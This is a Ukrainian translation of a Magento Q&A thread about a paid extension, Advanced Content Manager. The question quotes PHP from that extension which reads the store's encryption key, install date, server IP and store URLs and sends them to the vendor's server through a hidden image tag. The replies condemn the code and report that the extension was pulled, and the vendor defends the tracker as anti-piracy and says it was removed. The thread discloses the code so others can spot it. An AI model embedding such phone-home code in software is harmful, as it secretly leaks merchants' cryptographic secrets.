Якась вагома причина для модуля віддаленого доступу до глобального / крипто / ключа?


19

Пробачте про моє невігластво, але криптовалюта використовується для розшифровки даних Magento, правда? Чи є якась вагома причина для доступу модуля до цього? Я наткнувся на цей код після встановлення Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />


3
ЦЕЙ. Є. ГОРОДНИЙ. Немає підстав просочувати ваш ключ шифрування.
Фабіан Блешшмідт

1
Це погано, дуже погано.
Анна Вьоклл

1
Приємний улов! Це надзвичайно погано ...
Сандер Мангел

1
Дякуємо @Sander за те, що нам сказали. Його було вилучено з Connect.
орієнтири

1
@benmarks рада це почути. Це вкрай невтішно з очевидних причин, а також тому, що додаток було надзвичайно вражаючим, а розробник був надзвичайно корисним та швидким у минулому.
TylersSN

Відповіді:


11

Так ... є вагома причина.
Вони хочуть знати це і записати його, про всяк випадок. :)

Вам слід видалити розширення (швидше за все, ви це вже зробили). Ніколи не слід використовувати розширення, які "телефонують додому", незалежно від того, які дані вони надсилають додому.

Ви можете перелічити тут розширення, щоб інші бачили: Смішний / марний / жахливий код від Magento Extensions


1
"телефонування додому", на жаль, виконується безліччю модулів. Amasty та Aheadworks роблять це також: \
Sander Mangel

4
Цей gist.github.com/miguelbalparda/b57a47a010a5995bc44d можна використовувати для перевірки глобальної / криптовалюти / ключа від CLI у всіх папках, що перевершують додаток / код / ​​ядро.
mbalparda

Тож вони не тільки можуть розшифрувати дані cc (добре, що я цього не зберігаю) паролі тощо. Але я заплатив 300 доларів за те, щоб вони мали таку можливість. Це те, що повинно бути розміщено у смішному.
TylersSN

1
@iUseMagentoNow. Це смішне «о-о», а не смішне «ха-ха». Ви повинні попросити повернути гроші.
Маріус

8

Сьогодні ми отримали запит на підтримку цієї функції. Ми це вже вирішили та видалили цей фрагмент коду. Новий випуск доступний для всіх наших клієнтів у зоні клієнтів (безкоштовно, оскільки ми пропонуємо необмежену кількість оновлень).

Я знаю, що нам потрібно це виправдати, тому зробимо це:

  • Метою цього трекера було ТІЛЬКО дотримуватися несанкціонованого використання нашого розширення.
  • Відстежувач відображався лише в області адміністрування (ніхто з ваших клієнтів чи хтось інший, ніж ви та ми не змогли його побачити).
  • Це ми також видалили в нашій БД.
  • Ключ полягає лише в шифруванні пароля адміністратора. Оскільки ми працюємо з усіма вами за допомогою запитів про підтримку, ви, можливо, вже надіслали свої повноваження нам електронною поштою для підтримки. Якби ми хотіли вашого пароля, ми безпосередньо надіслали його ... Це не була мета.
  • Навіть за допомогою ключа ваш пароль все ще зашифрований. І адміністратор magento блокує користувача після деяких спроб.

Ми визнаємо, що це помилка, і це сила громади та системи з відкритим кодом: ми можемо виправити та вдосконалити набагато швидше. Дякуємо всім, що попередили нас, зараз ми докладемо більше зусиль щодо вразливості.


3
+1 за те, що ви намагаєтесь відповісти тут публічно на Magento SE!
оч.

2
Самовільне використання розширення ?! Ви можете просто використовувати домен для цього.
mbalparda
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.